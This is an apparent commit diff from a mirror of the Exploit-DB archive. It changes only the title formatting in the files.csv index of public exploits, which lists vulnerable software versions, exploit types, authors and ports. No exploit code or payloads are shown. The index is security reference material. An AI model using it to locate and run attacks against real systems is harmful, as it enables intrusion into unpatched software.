bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-07-13

Browse source
This commit is contained in:
Offensive Security 2015-07-13 05:02:34 +00:00
parent 5df0c9137c
commit de22c9ec44
14 changed files with 1475 additions and 1475 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

126
files.csv
View file

@ -1119,7 +1119,7 @@ id,file,description,date,author,platform,type,port
1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0
1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0
1345,platforms/php/webapps/1345.php,"Xaraya <= 1.0.0 RC4 create() Denial of Service Exploit",2005-11-29,rgod,php,webapps,0
1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0
1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0
1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0
1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0
1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0
@ -5714,10 +5714,10 @@ id,file,description,date,author,platform,type,port
6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow Exploit (Win32)",2008-07-18,Unohope,windows,remote,80
6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit",2008-07-19,"Joxean Koret",multiple,dos,0
6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 (show.php) Remote SQL Injection Vulnerability",2008-07-20,Mr.SQL,php,webapps,0
6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0
6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0
6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
6105,platforms/asp/webapps/6105.pl,"HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)",2008-07-21,"Guido Landi",windows,local,0
6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (pl)",2008-07-21,"Guido Landi",windows,local,0
6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0
6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Remote Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0
6109,platforms/cgi/webapps/6109.pl,"MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0
@ -5727,12 +5727,12 @@ id,file,description,date,author,platform,type,port
6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit",2008-07-21,ldma,php,webapps,0
6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 (pid) Remote SQL Injection Vulnerability",2008-07-21,Cr@zy_King,php,webapps,0
6115,platforms/php/webapps/6115.txt,"EZWebAlbum Insecure Cookie Handling Vulnerability",2008-07-21,"Virangar Security",php,webapps,0
6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit",2008-07-22,"Guido Landi",windows,remote,0
6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit",2008-07-22,"Guido Landi",windows,remote,0
6117,platforms/php/webapps/6117.txt,"youtube blog 0.1 (rfi/sql/XSS) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0
6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0
6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0
6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll (default.asp catid) SQL Injection Vulnerability",2008-07-22,DreamTurk,asp,webapps,0
6120,platforms/minix/dos/6120.txt,"minix 3.1.2a tty panic Local Denial of Service Vulnerability",2008-07-23,kokanin,minix,dos,0
6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit (c)",2008-07-23,r0ut3r,windows,remote,0
6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit (c)",2008-07-23,r0ut3r,windows,remote,0
6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (meta)",2008-07-23,I)ruid,multiple,remote,0
6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (py)",2008-07-24,"Julien Desfossez",multiple,remote,0
6124,platforms/windows/remote/6124.c,"Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0
@ -5806,7 +5806,7 @@ id,file,description,date,author,platform,type,port
6192,platforms/php/webapps/6192.txt,"k-links directory (sql/XSS) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0
6193,platforms/php/webapps/6193.txt,"E-Store Kit- <= 2 PayPal Edition - (pid) SQL Injection Vulnerability",2008-08-02,Mr.SQL,php,webapps,0
6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0
6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit",2008-08-03,r0ut3r,windows,remote,0
6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 - (imgsrc) Remote Buffer Overflow Exploit",2008-08-03,r0ut3r,windows,remote,0
6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit",2008-08-03,crit3rion,hardware,dos,0
6199,platforms/php/webapps/6199.pl,"Joomla Component EZ Store Remote Blind SQL Injection Exploit",2008-08-03,His0k4,php,webapps,0
6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 (index.php page) Local File Inclusion Vulnerability",2008-08-03,SirGod,php,webapps,0
@ -5833,7 +5833,7 @@ id,file,description,date,author,platform,type,port
6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final (startup.php) Remote File Inclusion Vulnerability",2008-08-10,CraCkEr,php,webapps,0
6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 Insecure Cookie Handling Vulnerability",2008-08-10,"Virangar Security",php,webapps,0
6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-08-10,"Virangar Security",php,webapps,0
6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0
6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0
6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 (image.php id) SQL Injection Vulnerability",2008-08-10,nuclear,php,webapps,0
6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2008-08-11,"Simon Ryeo",multiple,remote,0
6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 (bannerclick.php adid) SQL Injection Vulnerability",2008-08-11,"Hussin X",php,webapps,0
@ -5844,7 +5844,7 @@ id,file,description,date,author,platform,type,port
6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 (img) Remote File Disclosure Vulnerability",2008-08-13,JIKO,php,webapps,0
6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0
6237,platforms/multiple/dos/6237.txt,"Ventrilo <= 3.0.2 - NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0
6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit",2008-08-13,kralor,windows,remote,0
6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow Exploit",2008-08-13,kralor,windows,remote,0
6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0
6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote BoF Exploit PoC (0day)",2008-08-13,h07,windows,dos,0
6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BoF PoC",2008-08-14,Symantec,windows,dos,0
@ -7122,7 +7122,7 @@ id,file,description,date,author,platform,type,port
7579,platforms/php/webapps/7579.txt,"ClaSS <= 0.8.60 (export.php ftype) Local File Inclusion Vulnerability",2008-12-24,fuzion,php,webapps,0
7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 (lang) Local File Inclusion Vulnerability",2008-12-24,fuzion,php,webapps,0
7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0
7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0
7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0
7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0
7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0
7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0
@ -7145,7 +7145,7 @@ id,file,description,date,author,platform,type,port
7605,platforms/php/webapps/7605.php,"TaskDriver <= 1.3 - Remote Change Admin Password Exploit",2008-12-29,cOndemned,php,webapps,0
7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 Admin Bypass Change User Password Vulnerability",2008-12-29,R31P0l,php,webapps,0
7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit",2008-12-29,StAkeR,php,webapps,0
7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 (ProxyLogin) Local Stack Overflow Exploit",2008-12-29,His0k4,windows,local,0
7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow Exploit",2008-12-29,His0k4,windows,local,0
7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0
7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal (deptdisplay.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0
7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection Exploit",2008-12-29,s4avrd0w,php,webapps,0
@ -7244,7 +7244,7 @@ id,file,description,date,author,platform,type,port
7704,platforms/php/webapps/7704.pl,"Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit",2009-01-08,darkjoker,php,webapps,0
7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit",2009-01-08,StAkeR,php,webapps,0
7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext <= 1.2.0-RC1 mIRC script",2009-01-08,Phil,windows,remote,0
7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0
7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0
7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - (.mp3) Local Heap Overflow PoC",2009-01-09,Houssamix,windows,dos,0
7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - (.asx) (HREF) Local Buffer Overflow PoC",2009-01-09,"aBo MoHaMeD",windows,dos,0
7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service Exploit",2009-01-09,Skylined,windows,dos,0
@ -7671,7 +7671,7 @@ id,file,description,date,author,platform,type,port
8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0
8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability",2009-03-03,Pepelux,php,webapps,0
8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability",2009-03-03,kecemplungkalen,php,webapps,0
8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Fast)",2009-03-04,"Ahmed Obied",windows,remote,0
8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0
8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)",2009-03-04,Dr4sH,windows,remote,80
8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure Vulnerability",2009-03-04,Stack,windows,remote,0
8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0
@ -9077,7 +9077,7 @@ id,file,description,date,author,platform,type,port
9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0
9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
9618,platforms/windows/local/9618.php,"Millenium MP3 Studio (pls/mpf/m3u) Local Universal BoF Exploits (SEH)",2009-09-09,hack4love,windows,local,0
9618,platforms/windows/local/9618.php,"Millenium MP3 Studio - (pls/mpf/m3u) Local Universal BoF Exploits (SEH)",2009-09-09,hack4love,windows,local,0
9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BoF (SEH)",2009-09-09,hack4love,windows,local,0
9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0
9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 - (Get Request) Denial of Service Vulnerability",2009-09-10,"Usman Saeed",windows,dos,0
@ -9275,8 +9275,8 @@ id,file,description,date,author,platform,type,port
9891,platforms/php/webapps/9891.txt,"Joomla Jshop SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0
9892,platforms/php/webapps/9892.txt,"Joomla Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0
9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption PoC",2009-10-15,Skylined,windows,remote,80
9894,platforms/windows/local/9894.txt,"Millenium MP3 Studio 2.0 m3u file BoF",2009-10-15,dellnull,windows,local,0
9895,platforms/windows/local/9895.txt,"Millenium MP3 Studio 2.0 mpf file BoF",2009-10-14,dellnull,windows,local,0
9894,platforms/windows/local/9894.txt,"Millenium MP3 Studio 2.0 - (m3u) BoF",2009-10-15,dellnull,windows,local,0
9895,platforms/windows/local/9895.txt,"Millenium MP3 Studio 2.0 - (mpf) BoF",2009-10-14,dellnull,windows,local,0
9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 BoF",2009-10-19,iM4n,windows,remote,80
9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0
9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 Root folder disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
@ -9478,7 +9478,7 @@ id,file,description,date,author,platform,type,port
10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0
10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
10107,platforms/windows/local/10107.pl,"Icarus 2.0 - (.pgn) Universal Local Buffer Overflow Exploit (SEH)",2009-11-17,"D3V!L FUCK3R",windows,local,0
10160,platforms/windows/dos/10160.py,"FtpXQ authenticated Remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21
10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21
10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass and File Upload Vulnerability",2009-11-17,blackenedsecurity,asp,webapps,0
10162,platforms/windows/remote/10162.py,"Home FTP Server 'MKD' Command Directory Traversal Vulnerability",2009-11-17,zhangmc,windows,remote,21
10163,platforms/windows/dos/10163.pl,"Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability",2009-11-17,karak0rsan,windows,dos,80
@ -9525,7 +9525,7 @@ id,file,description,date,author,platform,type,port
10220,platforms/php/webapps/10220.txt,"pointcomma <= 3.8b2 - Remote File Inclusion Vulnerability",2009-11-24,"cr4wl3r ",php,webapps,0
10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote DoS Vulnerability",2009-11-24,leinakesi,windows,dos,21
10222,platforms/php/webapps/10222.txt,"W3infotech (Auth Bypass) SQL Injection Vulnerability",2009-11-24,ViRuS_HiMa,php,webapps,0
10223,platforms/windows/dos/10223.txt,"TYPSoft 1.10 APPE DELE DoS",2009-11-24,leinakesi,windows,dos,21
10223,platforms/windows/dos/10223.txt,"TYPSoft 1.10 - APPE DELE DoS",2009-11-24,leinakesi,windows,dos,21
10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 - CSRF Vulnerabilities",2009-11-24,"Alice Kaerast",php,webapps,0
10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL injection",2006-05-26,KOUSULIN,windows,webapps,1000
10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist (.m3u) BOF",2009-11-25,Rick2600,windows,local,0
@ -9541,7 +9541,7 @@ id,file,description,date,author,platform,type,port
10236,platforms/php/webapps/10236.txt,"Flashden Multiple File Uploader Shell Upload Vulnerability",2009-11-26,DigitALL,php,webapps,0
10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 Malformed URL Request DoS Vulnerability",2000-06-01,netsec,hardware,dos,80
10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - Remote SQL Injection Vulnerability",2009-11-28,kaMtiEz,php,webapps,0
10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 pls Buffer Overflow Exploit",2009-11-28,Molotov,windows,local,0
10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - (pls) Buffer Overflow Exploit",2009-11-28,Molotov,windows,local,0
10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability",2009-11-28,DigitALL,php,webapps,0
10242,platforms/php/webapps/10242.txt,"PHP _multipart/form-data_ Denial of Service Exploit (Python)",2009-11-27,Eren,php,webapps,0
10243,platforms/php/webapps/10243.txt,"PHP MultiPart Form-Data Denial of Service PoC",2009-11-22,"Bogdan Calin",php,webapps,0
@ -9607,9 +9607,9 @@ id,file,description,date,author,platform,type,port
10318,platforms/php/webapps/10318.txt,"Joomla yt_color YOOOtheme XSS and Cookie Stealing",2009-12-04,andresg888,php,webapps,80
10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow Exploit",2009-12-05,Dr_IDE,windows,local,0
10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0
10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0
10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0
10322,platforms/windows/local/10322.py,"Audacity 1.2.6 (gro File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0
10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 (hhp) Buffer Overflow Exploit (Universal)",2009-12-05,Dz_attacker,windows,local,0
10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow Exploit (Universal)",2009-12-05,Dz_attacker,windows,local,0
10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0
10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins - Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0
10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow Vulnerability",2009-02-03,"Wolfgang Hamann",multiple,local,0
@ -9620,7 +9620,7 @@ id,file,description,date,author,platform,type,port
10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow - MSF Universal",2009-12-06,dookie,windows,local,0
10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC",2009-12-06,Dr_IDE,windows,dos,0
10334,platforms/multiple/dos/10334.py,"VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0
10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (Meta)",2009-12-07,loneferret,windows,local,0
10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (Meta)",2009-12-07,loneferret,windows,local,0
10337,platforms/php/webapps/10337.txt,"Chipmunk Newsletter Persistant XSS Vulnerability",2009-12-07,mr_me,php,webapps,0
10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption PoC (0day)",2009-12-07,"Jeremy Brown",linux,dos,0
10339,platforms/windows/local/10339.pl,"gAlan 0.2.1 - Buffer Overflow Exploit (0day)",2009-12-07,"Jeremy Brown",windows,local,0
@ -9684,7 +9684,7 @@ id,file,description,date,author,platform,type,port
10408,platforms/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection Vulnerability",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
10410,platforms/php/webapps/10410.txt,"phpldapadmin Local File Inclusion",2009-12-10,ipsecs,php,webapps,0
10412,platforms/php/webapps/10412.txt,"Acc PHP eMail 1.1 - CSRF",2009-12-13,bi0,php,webapps,0
10414,platforms/php/webapps/10414.txt,"Frog 0.9.5 - CSRF Vulnerability",2009-12-13,"Milos Zivanovic ",php,webapps,0
10414,platforms/php/webapps/10414.txt,"Frog CMS 0.9.5 - CSRF Vulnerability",2009-12-13,"Milos Zivanovic ",php,webapps,0
10417,platforms/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,php,webapps,0
10418,platforms/php/webapps/10418.txt,"Ele Medios CMS SQL Injection Vulnerability",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple CSRF Vulnerabilities",2009-12-13,"Milos Zivanovic ",php,webapps,0
@ -9800,7 +9800,7 @@ id,file,description,date,author,platform,type,port
10552,platforms/php/webapps/10552.txt,"FestOs <= 2.2.1 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers Remote DoS Exploit",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0
10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 - Vulnerability",2009-12-19,Global-Evolution,php,webapps,0
10556,platforms/windows/local/10556.c,"PlayMeNow Malformed M3U Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0
10556,platforms/windows/local/10556.c,"PlayMeNow 7.3 / 7.4 - Malformed M3U Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0
10557,platforms/php/local/10557.php,"PHP 5.2.12/5.3.1 symlink() open_basedir bypass",2009-12-19,"Maksymilian Arciemowicz",php,local,0
10558,platforms/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure Vulnerability",2009-12-19,"ViRuSMaN ",asp,webapps,0
10560,platforms/php/webapps/10560.txt,"Lizard Cart Multiple SQL Injection Exploit",2009-12-19,"cr4wl3r ",php,webapps,0
@ -9836,7 +9836,7 @@ id,file,description,date,author,platform,type,port
10593,platforms/windows/dos/10593.txt,"Winamp <= 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0
10594,platforms/php/webapps/10594.txt,"The Uploader 2.0 - Remote File Upload Vulnerability",2009-12-22,"Master Mind",php,webapps,0
10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow Exploit",2009-12-22,data$hack,windows,local,0
10596,platforms/windows/local/10596.pl,"PlayMeNow Malformed (M3U) Universal XP Seh BoF",2009-12-22,"ThE g0bL!N",windows,local,0
10596,platforms/windows/local/10596.pl,"PlayMeNow - Malformed (M3U) Universal XP Seh BoF",2009-12-22,"ThE g0bL!N",windows,local,0
10597,platforms/php/webapps/10597.txt,"Active PHP Bookmarks 1.3 - SQL Injection Vulnerability",2009-12-22,Mr.Elgaarh,php,webapps,0
10598,platforms/php/webapps/10598.txt,"deluxebb <= 1.3 - Multiple Vulnerabilities",2009-12-22,"cp77fk4r ",php,webapps,0
10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 File Disclosure Vulnerability",2009-12-22,Stack,php,webapps,0
@ -9978,7 +9978,7 @@ id,file,description,date,author,platform,type,port
10759,platforms/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Stack BOF",2009-12-28,corelanc0d3r,windows,local,0
10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario Blind SQL Injection Vulnerability",2009-12-28,Mr.tro0oqy,php,webapps,0
10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower SQL Injection Vulneralbility",2009-12-28,"Don Tukulesto",php,webapps,0
10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0
10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader - Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
@ -9991,7 +9991,7 @@ id,file,description,date,author,platform,type,port
10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10779,platforms/php/webapps/10779.txt,"DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability",2009-12-29,SecurityRules,php,webapps,0
10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog - DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10781,platforms/php/webapps/10781.txt,"ActiveKB RFI Vulnerability",2009-12-29,indoushka,php,webapps,0
